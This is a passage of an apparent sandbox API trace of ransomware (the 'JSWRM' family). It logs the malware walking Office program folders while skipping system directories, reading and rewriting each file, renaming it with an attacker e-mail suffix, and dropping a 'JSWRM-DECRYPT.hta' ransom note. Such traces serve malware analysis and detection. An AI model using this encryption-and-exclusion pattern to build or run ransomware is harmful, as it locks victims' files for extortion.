lpString2="perflogs") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="documents and settings") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="system volume information") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="msocache") returned 1 [0143.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORDREP.DPV", lpUsedDefaultChar=0x0) returned 11 [0143.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORDREP.DPV", lpUsedDefaultChar=0x0) returned 11 [0143.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WORDREP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wordrep.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.734] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=499307) returned 1 [0143.734] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.735] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.748] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.748] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.748] CloseHandle (hObject=0x238) returned 1 [0143.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WORDREP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wordrep.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WORDREP.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wordrep.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.751] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23598a6d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23598a6d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1854, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WORDREP.XML", cAlternateFileName="")) returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2=".") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="..") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="...") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="windows") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="recovery") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="perflogs") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="documents and settings") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="$RECYCLE.BIN") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="system volume information") returned 1 [0143.751] lstrcmpiW (lpString1="WORDREP.XML", lpString2="msocache") returned 1 [0143.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORDREP.XML", lpUsedDefaultChar=0x0) returned 11 [0143.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORDREP.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORDREP.XML", lpUsedDefaultChar=0x0) returned 11 [0143.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WORDREP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wordrep.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.753] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6228) returned 1 [0143.753] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.753] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1850, lpOverlapped=0x0) returned 1 [0143.754] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.754] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1850, lpOverlapped=0x0) returned 1 [0143.755] CloseHandle (hObject=0x238) returned 1 [0143.755] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WORDREP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wordrep.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WORDREP.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wordrep.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.756] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23572815, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23572815, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dd6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WPULQT98.POC", cAlternateFileName="")) returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2=".") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="..") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="...") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="windows") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="recovery") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="perflogs") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="documents and settings") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="system volume information") returned 1 [0143.756] lstrcmpiW (lpString1="WPULQT98.POC", lpString2="msocache") returned 1 [0143.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPULQT98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPULQT98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WPULQT98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPULQT98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPULQT98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WPULQT98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WPULQT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wpulqt98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.757] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11734) returned 1 [0143.757] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.757] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2dd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2dd0, lpOverlapped=0x0) returned 1 [0143.759] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.760] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2dd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2dd0, lpOverlapped=0x0) returned 1 [0143.760] CloseHandle (hObject=0x238) returned 1 [0143.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WPULQT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wpulqt98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WPULQT98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wpulqt98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.761] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23572815, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23572815, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31d6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WSIDBR98.POC", cAlternateFileName="")) returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2=".") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="..") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="...") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="windows") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="recovery") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="perflogs") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="documents and settings") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="system volume information") returned 1 [0143.761] lstrcmpiW (lpString1="WSIDBR98.POC", lpString2="msocache") returned 1 [0143.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSIDBR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSIDBR98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSIDBR98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSIDBR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WSIDBR98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSIDBR98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WSIDBR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wsidbr98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.762] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12758) returned 1 [0143.762] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.762] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x31d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x31d0, lpOverlapped=0x0) returned 1 [0143.764] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.764] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x31d0, lpOverlapped=0x0) returned 1 [0143.765] CloseHandle (hObject=0x238) returned 1 [0143.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WSIDBR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wsidbr98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WSIDBR98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wsidbr98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.766] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23572815, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23572815, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31d6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WSIDBR98.POC", cAlternateFileName="")) returned 0 [0143.766] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0143.766] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda173cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2=".") returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="..") returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="...") returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="windows") returned -1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="recovery") returned -1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="perflogs") returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="documents and settings") returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="$RECYCLE.BIN") returned 1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="system volume information") returned -1 [0143.766] lstrcmpiW (lpString1="QUERIES", lpString2="msocache") returned 1 [0143.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\QUERIES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\queries\\jswrm-decrypt.hta")) returned 0xffffffff [0143.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\QUERIES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\queries\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.767] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0143.768] CloseHandle (hObject=0x45c) returned 1 [0143.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\QUERIES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\queries\\jswrm-decrypt.hta")) returned 0x20 [0143.768] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\QUERIES\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4c59f60d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0143.769] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.769] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4c59f60d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.769] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.769] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.769] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c59f60d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4c59f60d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4c59f60d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0143.769] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0143.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0143.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0143.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0143.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0143.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 